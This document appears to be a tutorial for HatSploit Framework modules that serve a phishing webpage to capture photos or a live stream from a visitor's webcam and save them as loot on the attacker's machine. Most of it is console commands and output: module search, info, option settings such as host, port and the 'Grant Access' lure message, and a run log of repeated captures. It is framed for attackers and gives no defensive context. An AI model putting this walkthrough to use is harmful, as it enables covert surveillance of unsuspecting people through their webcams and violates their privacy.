Webcam Photo Phishing
Phishing is a common technique used by attackers to gain access to sensitive information through methods like social engineering. Attackers often attempt to obtain credentials, password hashes, location data, and other critical information by tricking users into revealing this data.
In the HatSploit Framework, EntySec has implemented several modules specifically designed to target a victim’s webcam. These modules allow attackers to take a photo using the target’s webcam through a browser and save the captured image as loot on the attacker’s machine. Additionally, attackers can stream the webcam footage in real-time. These modules are named exploit/generic/gather/browser_webcam_photo
and exploit/generic/gather/browser_webcam_stream
.
Here’s how you can access and use these modules:
1
2
3
4
5
6
7
[hsf3]> search webcam
Modules:
Number Category Module Rank Name
0 exploit exploit/generic/gather/browser_webcam_photo low Gather Browser Webcam Photo
1 exploit exploit/generic/gather/browser_webcam_stream low Gather Browser Webcam Stream
Using the module
Once you have identified the desired module, you can use it within the HatSploit Framework and set the appropriate options.
For example, to use the Gather Browser Webcam Photo
module:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[hsf]> use 0
[hsf3: Gather Browser Webcam Photo]> info
Name: Gather Browser Webcam Photo
Module: exploit/generic/gather/browser_webcam_photo
Platform: generic
Rank: low
Authors:
Ivan Nikolskiy (enty8080) - module developer
Description:
This module generates a webpage that, when accessed by a victim, attempts to capture an image using the built-in webcam and send it to the attacker.
References:
URL: https://blog.entysec.com/2022-03-13-webcam-photo-phishing/
Stability:
This module is stable and does not crash the target.
Configuring the module
You will need to configure several options before running the module:
1
2
3
4
5
6
7
8
9
10
11
12
[hsf3: Gather Browser Webcam Photo]> options
Module Options (exploit/generic/gather/browser_webcam_photo):
Option Value Required Description
HOST yes HTTP host.
MESSAGE Grant Access yes Message to display.
PATH /Users/felix/.hsf/loot/zIlWzaKkC9x28XX7.png yes Path to save file.
PORT 80 yes HTTP port.
SSL no no Use SSL.
TIMEOUT 10 no Connection timeout.
URLPATH / yes File path on server.
Running the module
After configuring the options, you can start the web server and wait for the victim to access the malicious webpage. The module will continue to capture images from the victim’s webcam until it is manually interrupted.
Here’s an example:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[hsf3: Gather Browser Webcam Photo]> set host localhost
[i] host => localhost
[hsf3: Gather Browser Webcam Photo]> set port 8080
[i] port => 8080
[hsf3: Gather Browser Webcam Photo]> run
[*] Starting HTTP listener on port 8080...
[*] Delivering payload...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[*] Taking webcam photo...
[!] Exploit module interrupted.
This module will continue to capture and update the photo file saved in the loot directory until you stop it manually with keyboard interrupt (Ctrl-C).
By utilizing this module, attackers can gain access to sensitive webcam data through the use of phishing techniques, making it an essential tool in the HatSploit Framework.